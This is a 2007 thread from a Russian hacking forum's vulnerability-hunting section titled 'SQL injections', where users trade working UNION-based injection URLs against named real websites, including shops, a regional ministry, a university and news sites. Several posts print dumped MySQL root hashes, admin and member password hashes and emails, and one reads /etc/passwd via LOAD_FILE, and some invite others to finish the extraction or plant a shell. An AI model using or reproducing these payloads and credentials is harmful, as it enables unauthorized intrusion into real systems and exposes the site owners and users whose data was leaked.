1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

SQL-инъекции

Тема в разделе "Поиск уязвимостей", создана пользователем Constantine, 8 май 2007.

  1. Constantine
    Constantine Guest
    Постим только Sql inj.
    Флеймить запрещаеться.
    Вопросы не задаем.
    Катерогически запрещаеться выкладывать уязвимость в таком виде - http://site.ru/index.php?id=1' Хотябы подбирайте число колонок, показывайте что разбираетесь в баге
    Запрещено выкладывать узявимости на сайтах из данного листа - http://hlamidnik.h18.ru/SQLS.html
     
    8 май 2007
    1 человеку нравится это.
  2. ZeroCold
    ZeroCold Новичок
    Симпатии:
    12
    Код:
    http://www.forexdreamland.com/index.php?go=11&news=13'+union+select+1,2,version(),4,5,6/*&ss_Session=6b4a145bccbc45b5129eb7dcd5ebc32c
     
    Последнее редактирование модератором: 16 май 2007
    9 май 2007
    2 пользователям это понравилось.
  3. Constantine
    Constantine Guest
    Код:
    http://www.autohalle24.de/include/include.php?id=-019+union+select+char(1),concat_ws(0x3a,user(),version(),database()),null,null,null/*
     
    9 май 2007
    1 человеку нравится это.
  4. ZeroCold
    ZeroCold Новичок
    Симпатии:
    12
    Код:
    _http://www.lowbudgetcaravans.nl/index/indexx.php?id=-126+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt(version(),0x71),0x71),8,9,10,11,12,13
    Код:
    _http://www.esgieha.pl/indexx.php?case2=&id=-2637+union+select+1,2,3,4,5,6,concat(database(),0x3a,version()),8,9,10,11,12,13,14
     
    Последнее редактирование модератором: 27 май 2007
    10 май 2007
    3 пользователям это понравилось.
  5. Constantine
    Constantine Guest
    Проверяем версию
    Код:
    http://www.projectmedishare.org/field.php?id=-34+union+select+1,2,3,version(),5,6,7,8,9,10,11/*
    подбираем таблицу
    Код:
    http://www.projectmedishare.org/field.php?id=-34+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11+from+user/*
    Чтобы вытащить логин и пароль юзера(ов) нужно подобрать столбцы, вот вам задачка
     
    11 май 2007
  6. Koller
    Koller Исчез... Глобальный модератор
    Симпатии:
    128
    Вложу и я небольшую лепту...
    Кафе-бар "Кружка" (сеть пивных ресторанов)

    Код:
    http://www.kruzhka.ru/news/?datebegin=2006-01-01&dateend=%22+union+select+1,user(),version(),4,5,6+from+news/*
     
    11 май 2007
    1 человеку нравится это.
  7. ZeroCold
    ZeroCold Новичок
    Симпатии:
    12
    Код:
    _http://bip.kielce.rio.gov.pl/index.php?go=22&id_k=-93+union+select+1,2,3,version()/*
     
    Последнее редактирование модератором: 16 май 2007
    16 май 2007
    1 человеку нравится это.
  8. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    _http://www.russianculture.ru/search.asp?SearchMode=True&SearchStr=abc'&SearchB=True&SearchP=True
    
    влом самому с МССКЛ копаться... кому нада продолжите инъекцЫю
    
    PS
    
    там куча багов на сайте...
     
    16 май 2007
  9. ZeroCold
    ZeroCold Новичок
    Симпатии:
    12
    Код:
    http://www.mrflag.com/index.php?doc=17&aid=-2384+union+select+1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5,6,7/*
    Код:
    http://www.pbworld.co.uk/index.php?doc=7&aid=-33+union+select+1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5,6/*
     
    16 май 2007
  10. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    _http://www.djbobo.ru/guestbook.asp?Page=21'
    В данном случае опять асп+МССКЛ. И на сей раз я не оч понял што это есть такое и решил дать знающим людям) мне мускл роднее

    Добавлено через 3 минуты
    Код:
    _http://www.basketdynamo.ru/people.php?club_id=1'
    На сей раз мускл - если разберусь то дам вытянутую БД а если нет то мошт кто еще смогет )

    Добавлено через 18 часов 32 минуты
    Выбираем последнего зарегенного юзверя

    Код:
    _http://www.loshadi.ru/reg.php?link=users+UNION+SELECT+NULL,password,NULL,NULL,NULL,NULL,NULL,NULL,NULL+FROM+db_loshadi.users/*
    ЗЫ

    уязвимость была примерно полгода назад ща не проверял мошт удалили но врядли...

    Добавлено через 22 часа 35 минут
    Код:
    _http://www.viam.spb.ru/cont/cont_equip.php?id=154'
    параметр при простом кликанье на линк исчезает так што нада копипистить) на 3 строчках скрипта есть ашипки мускла. обойти их имхо тяжело.

    Добавлено через 22 часа 50 минут
    што то мну везет на МССКЛ:

    Код:
    _http://www.bibliosfera.com/catalog.asp
    тут введите в поиск например test' и будет ошибка внизу паги... поскоку тут фреймы я немогу дать полный линк =\

    Код:
    _http://www.infra-m.ru/live/price.asp?id=406784'
    тут еще МССКЛ. В середине вывевшийся паги есть указание. и запрос.

    Добавлено через 23 часа 43 минуты
    GAY.RU не рулит +)

    Код:
    _http://gay.ru/search.zhtml?wf=3661&s=RP&sp=1&q=test%27&ul='&m=all&o=1'&r=
     
    Последнее редактирование: 20 май 2007
    19 май 2007
  11. KPOT_f1nd
    KPOT_f1nd hiddeN Stuff Новичок
    Симпатии:
    11
    Код:
    http://www.dukemednews.com/news/article.php?id=-9979+union+select+user,2,3,4,5,password,7,8+from+mysql.user/*
    root:623460e26f081bbc + еще имееться усеры
    Код:
    http://www.dcresource.com/news/newsitem.php?id=-3436+union+select+1,2,user(),database(),5,6,7,8,9/*
    только нашел тему)))

    Код:
    http://live.ece.utexas.edu/People/people_detail.php?id=-97+union+select+1,database(),3,version(),password,user,7,user(),9,10,11,12+from+mysql.user/*
    root:327cc28f2c9db092

    Код:
    http://www.taksa-shop.ru/index.php?id=-1+union+select+1,password+from+users/*
    limit в помощь, ответ от БД смотрите в теги <title></title>

    Код:
    http://www.a2k.org.ua/news.php?id=-30+union+select+1,2,3,user,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users/*
    +limit+1,1/* в помощь
    admi:d23d8b79f575bcc0eedfb8c4e2f13540
    priv:21cec257feb15bcc84e0acd5b0773883

    Код:
    http://zvisti.com.ua/info.php?id=-3953+union+select+1,2,3,4,5,database(),7,version(),9,10,email,user()+from+subscribers+limit+1,1/*
    Министерство экономического развития Калужской области​
    Код:
    http://inkaluga.ru/econ_mun/review.php?id=-51+union+select+concat(user(),0x3a,version(),0x3a,database())/*
    Код:
    http://www.acconcept.ru/news/news.php?id=-124+union+select+1,passwd,3,4,membername,6,7,8+from+smf_members/*
    Код:
    d286012284d40b859c81b773c260ea4d03821c1c:Natali
    53f6dbb9fd0bb1e45bdb114ffdeb5167bec445d1:mofa
    be1e6dcf9cd70f318bad866c521bc3bb8750889d:Rust
    924e378db9cb2016fcb0e813ce6bcc735cc3461b:Fadin Denis
    a119561acfc07337fdf05ce695343532c011df58:Alexander.A.Sorokin
    52a4a8123268ee014ce79b8e7cb30e4f70918858:SFU
    e93b7fe16991598e7bc523fba140adce6ffcb303:KamV
    156da86923db93bf020958f39991fbd3b73d490c:Алексей Целищев
    c960e53946d1c4ea02c5516c82d20d0e52e6999a:reduhin
    824ef2d6d0aaf1eb500fdfb4e5aa7c1673ca7895:Андрей
    a3497dbf28bb4a05e88feea07efed24b150fc638:NIKITA
    0af4ae9b26fb793e93ca52f9735fe4aae9cb1931:елисеенко
    a01249b67aa2af18b39cf1c6513b8f621ecf63c2:Кучкаров
    c78840fd55285ff4d96d8f15016fd2de6ef9b717:DRIGGER
    660b797b6e8d6ebf4e7e483069b973c5ba564d3a:lzanuda
    a13d103e2ddbdfeb417c3843c55d2aca7d7adb4c:синичка
    Код:
    http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*
    
    admins/users - еще есть форум, походу самописный...

    Код:
    http://www.parks.it/news/dettaglio.php?id=-1221+union+select+1,user,password,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
    root:0a9236882f7cf8a1
    [email protected]

    Код:
    http://www.sodalitas.it/news.php?ID=-215+union+select+1,user,password,user(),5,6,7,8,9,10,database(),version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+user/*
    Код:
    http://www.aiap.it/news.php?ID=-864+union+select+1,user(),version(),4,5,6,7,database()+from+n_news/*
    Код:
    http://www.turkuaz.us/news_det.php?newsId=-587+union+select+1,user(),database(),version(),5,6,7,8,9/*&catId=32
    Код:
    http://lonuestro.us/sectionfiles/article.php?id=-218+union+select+1,database(),version(),4,5,6,7,user(),9,10,11,12/*
    www.dvd-express.ru - shop
    Код:
    http://www.dvd-express.ru/details.php?Id=-18034+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(pwd,0x3a,email),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users+limit+2,1/*=6
    пороботайте через limit:
    +from+users+limit+2,1/*
    +from+users+limit+3,1/*
    +from+users+limit+4,1/* и т.д
     
    Последнее редактирование: 1 июн 2007
    1 июн 2007
    3 пользователям это понравилось.
  12. fYt
    fYt Продвинутый
    Симпатии:
    17
    Код:
    http://www.smaterbuka.net/index.php?menu=profile&pro=15&iduser=2666666+union+select+1,2,3,concat(VERSION(),char(58),DATABASE(),char(58),USER()),5,6,7+from+user/*
    Код:
    http://www.primiciasya.com/gh/v.php?id=1916777+union+select+1,2,3,4,concat(VERSION(),char(58),USER(),char(58),DATABASE()),6,7,8,9/*&sec=gh3
    Код:
    http://www.dayudm.ru/phorum.php?msid=5009222+union+select+1,2,3,concat(VERSION(),char(58),DATABASE(),char(58),USER()),5,6,7,8,9/*
    Добавлено через 21 час 1 минуту
    Код:
    http://www.ramld.ru/articles/article.php?id=7777777+union+select+1,2,3,4,5,6,concat(VERSION(),char(58),USER(),char(58),DATABASE())/*&s_id=3
    Код:
    http://www.democracy.ru/article.php?id=247777+union+select+1,2,concat(VERSION(),char(59),DATABASE(),char(58),USER()),4,5,6,7,8,9,10,11,12,13,14,15,16/*
    Код:
    http://www.trud.ru/issue/article.php?id=20070413063010444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(VERSION(),char(59),DATABASE(),char(58),USER()),14/*
    Код:
    http://termini.lza.lv/article.php?id=344444+union+select+1,concat(name,char(58),pass),concat(VERSION(),char(59),DATABASE(),char(58),USER()),LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,7,8,9,10,11,12,13,14,15,16,17+from+users/*
     
    Последнее редактирование: 4 июн 2007
    3 июн 2007
    2 пользователям это понравилось.
  13. KPOT_f1nd
    KPOT_f1nd hiddeN Stuff Новичок
    Симпатии:
    11
    Код:
    http://www.id-t.nl/news-subpage.php?newsid=-5449+union+select+1,2,3,4,5,6,7,user,password,user(),11,12,13,14,15,16,17,18+from+mysql.user/*
    root:69540c43630a0fad
    [email protected]


    Код:
    http://www.montevideo.nl/en/nieuws/detail.php?id=-108'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database(),0x3a)/*&archief=
     
    4 июн 2007
    2 пользователям это понравилось.
  14. fYt
    fYt Продвинутый
    Симпатии:
    17
    Код:
    http://www.paviljon.com/vidi_posao.php?id=888888+union+select+1,2,username,password,5,6,7,8,9,10,concat(VERSION(),char(58),USER(),char(58),DATABASE()),12,13,14,15+from+c_reg_users/*
    чат, admin/admin(правда там никого нет), форум(никадмина/никадмина, шелл залить не смог, попробуйте кто нибудь...)

    Код:
    http://www.orthodoxinfo.net/url.php?id=6911111+union+select+1,2,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),4,5,6,8,9,10,11,12,13+from+sites/*
     
    5 июн 2007
    1 человеку нравится это.
  15. KPOT_f1nd
    KPOT_f1nd hiddeN Stuff Новичок
    Симпатии:
    11
    Код:
    http://www.mycow.eu/article.php?id=528+union+select+1,2,user(),4,5,version(),database()/*
    Код:
    http://www.articles.5mm.eu/index.php?id=-160+union+select+1,2,3,4/*
     
    7 июн 2007
    1 человеку нравится это.
  16. fYt
    fYt Продвинутый
    Симпатии:
    17
    Код:
    http://www.tku.co.jp/pc/news/view_news.php?id=11216666+union+select+1,2,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*&mod=3000
    Код:
    http://www.goode.co.uk/news/view_news.php?id=99999+union+select+1,2,3,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),5,6+from+news/*
     
    7 июн 2007
  17. KPOT_f1nd
    KPOT_f1nd hiddeN Stuff Новичок
    Симпатии:
    11
    Код:
    http://www.undime.org.br/htdocs/index.php?id=-3557'+union+select+1,2,user(),4,version(),6,7,8,9,10,11,12,13,14,database(),16,17,18,19,20,21,22/*
    Код:
    http://www.pontoflash.com.br/colunas/materia.php?Item=-186+union+select+1,table_name,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,7+from+information_schema.tables/*
    Код:
    http://catalog.weblink.org.ua/select.php?f_id=-2+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())/*
    Добавлено через 1 час 34 минуты
    Код:
    http://forums.tjat.com/wap/wapmisc.php?action=profile&u=-99%22%20union%20select%201,2,user,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,password,39,40,41,42,43,44,45,46,47+from+mysql.user/*
    root:4527fb015ba5ce7d
    Код:
    http://forums.tjat.com/wap/wapmisc.php?action=profile&u=-99%22%20union%20select%201,2,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,concat(user_email,char(58),user_password),39,40,41,42,43,44,45,46,47+from+phpbb_users+limit+1,1/*
    лимит в помощь

    ran:b45dc32e2201a8c4a39ea72cc1ad2cff
    Tjat.comTeam:9e592dbd5de6ec2fbcd1aef248202055
    dima:9e592dbd5de6ec2fbcd1aef248202055


    ICQ сервис www.tjat.com/wap.tjat.com

    сенкс M4g (c)​
     
    Последнее редактирование: 9 июн 2007
    9 июн 2007
    2 пользователям это понравилось.
  18. fYt
    fYt Продвинутый
    Симпатии:
    17
    Код:
    http://www.assofly.com/cat_news.php?id=12222222+union+select+1,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),3/*
    Код:
    http://www.pacificmaintenance.com/view_page.php?id=7777777+union+select+1,2,3,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),5,6,7,8,9,10,11,12/*
     
    10 июн 2007
  19. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    _http://lisenok.ru/cat.php?nsec=11 UNION SELECT 0,1,2,3,4,5,6,7,8,9
    liseno_liseno.users - таблица юзверей

    Код:
    _http://lisenok.ru/cat.php?nsec=11%20UNION%20SELECT%200,1,2,login,4,5,6,7,8,9%20FROM%20liseno_liseno.users
    Добавлено через 44 минуты
    Код:
    _http://www.elephant.ru/index.php?age=2%20UNION%20SELECT%201,2,login,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20elephantru.users
     
    Последнее редактирование: 10 июн 2007
    10 июн 2007
    1 человеку нравится это.
  20. fYt
    fYt Продвинутый
    Симпатии:
    17
    Код:
    http://www.retrans-art.ru/gview.php?id=2222222+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4/*
    Код:
    http://www.112uh.com/gview.php?id=877777777+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4/*
     
    16 июн 2007

Поделиться этой страницей

Загрузка...